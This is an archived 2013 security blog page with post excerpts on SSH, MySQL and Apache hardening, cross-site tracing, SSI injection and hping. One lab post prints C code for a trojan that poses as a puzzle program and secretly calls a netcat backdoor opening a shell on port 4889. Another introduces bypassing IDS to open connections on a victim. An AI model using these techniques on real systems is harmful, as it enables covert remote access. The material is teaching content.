Skip to main content

Posts

Showing posts from February, 2013

Digital Forensic LAb

Forensic LAb

Life Without Netcat !!

We know Netcat is a swiss army knife i.e. capable of doing many thing at one time without any extra edition in it.It can read and write to and from raw tcp ports or udp ports.So there's alot you can do with netcat in your hand.But what if your victim dont allow netcat or dont have netcat there or have a strong ids which have netcat signature??
Or
suppose you are a system administrator and want to administer remotely without netcat on client side??
If you cant run netcat on viticm(client) side then its not the end of world ,you can use trivial system calls and methods to create a temp connection very similar to the netcat .So in this post i want to enumerate some such trivial methods that can be used to produce raw tcp/ip connection from one side to other.
So in this scenario we are assuming that our attacker or system administrator have netcat in his disposal but some how he fail do implant it on victim side  because of some ids or firewall but can run scripts on it or can execut…

SSH Hardening

Tip 1:Generating Key


Tip 2:Telling SSH server To accept Your Key 

Tip 3:Disable Root Logins

Tip 04:Disable ssh Password Logins


Tip 5:Run SSh on Non-default port


Tip 6:Use Fail2ban
Fail2ban scans log files (e.g. /var/log/apache/error_log) and bans IPs that show the malicious signs -- too many password failures, seeking for exploits, etc. Generally Fail2Ban then used to update firewall rules to reject the IP addresses for a specified amount of time, although any arbitrary other action (e.g. sending an email, or ejecting CD-ROM tray) could also be configured. Out of the box Fail2Ban comes with filters for various services (apache, curier, ssh, etc)

Hardening Mysql

MySQL is the world's most used open source relational database management system (RDBMS) as of 2008 that runs as a server providing multi-user access to a number of databases.
MySQL is a popular choice of database for use in web applications, and is a central component of the widely used LAMP open source web application software stack (and other 'AMP' stacks). LAMP is an acronym for "Linux, Apache, MySQL, Perl/PHP/Python." Free-software-open source projects that require a full-featured database management system often use MySQL.

As you all known with great power  comes great responsibility :D...and malwares too ;-).So how can we make it difficult or impossible for any hacker to exploit our network by leveraging flaw in mysql running on our system??
Following tips will answer this question in depth:
Tip 1:Disable Remote Access
To restrict MySQL from opening a network socket, the following parameter should be added in the [mysqld] section of my.cnf or my.ini:
skip-n…

CROSS-SITE TRACING

When a client makes a request, that request may have to travel through firewalls, proxies, gateways, or other applications. Each of these has the opportunity to modify the original HTTP request. The TRACE method allows clients to see how its request looks when it finally makes it to the server. A TRACE request initiates a "loopback" diagnostic at the destination server. The server at the final leg of the trip bounces back a TRACE response, with the virgin request message it received in the body of its response. A client can then see how, or if, its original message was munged or modified along the request/response chain of any intervening HTTP applications
“Trace” is used simply as an input data echo mechanism for the http protocol. This request method is commonly used for debug and other connection analysis activities. The http trace request (containing request line, headers, post data), sent to a trace supporting web server, will respond to the client with the information…

SSI Injection Attack

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:
 Code: < ! # = / . " - > and [a-zA-Z0-9]
Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the app…

Hardening Apache2

Security Tip 1Disable Apache Signature and/or Apache Banner
Apache Signature or Apache Banner is basically the same thing. It is an application name together with version name that is printed when performing a web request. Nobody actually needs this information at all, but it is enabled by default. You need to alter the Apache configuration file to disable it. ServerSignature Off ServerTokens ProductOnly In Ubuntu, you need to change the following file: /etc/apache2/conf.d/security Double check that ServerSignature and ServerTokens configuration settings are not enabled in some other parts of the configuration file.


Security Tip 2:The Trace HTTP Request
HTTP TRACE request is used to echo back all received information. It can be tricked to print HTTP cookies and as a result steal HTTP session. Basically this request can be used as part of the Cross Site Scripting attack, or XSS. It is recommended to disable it as a security precaution. Add the following to the web-server's configu…

Ethical Hacking LAb-0x03

Aim: Create A BAckdoor
#include<stdio.h>
#include"nc.c"
int main()
{
int i;
printf("Logic puzzle\nselect option:\n1)Author\n2)About\n");
scanf("%d",&i);
switch(i)
{

case 1:
printf("Author: ");
printf("Vishal Mishra");
break;
case 2:
printf("Version .007 \n");
backdoor();
break;
}

return 0;
}

Click here to download
=>Prog.c
=>nc.c

As soon as the victim run this program, nc starts listening in the background at port number 4889 with a shell on it.So its a example of a very simple backdoor/trojan that can give access of your computer to the attacker.
In order to prevent this attack use a good firewall.And also keep checking at regular interval that what ports are open in your system, if you find any skeptical thing then immediately close that one or try to find out what service is using it.
you can do this using netstat command.It is available in linux as well as on window operating system.
if you are on a window…

Digital Forensics LAB

Aim:Computer Hardware Discovery and identifying Evidences.
Click Here To Download Lab File

hping

Hping3 And Hping2 hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time. Like most tools used in computer security, hping is useful to security experts, but there are a lot of applications related to network testing and system administration.
since version 3, that's now in alpha stage, hping is trying to not be just a little tool but to become a framework for scripting related to TCP/IP testing and security. hping3 continues to be command-line compatible with hping2, but integrates two main new …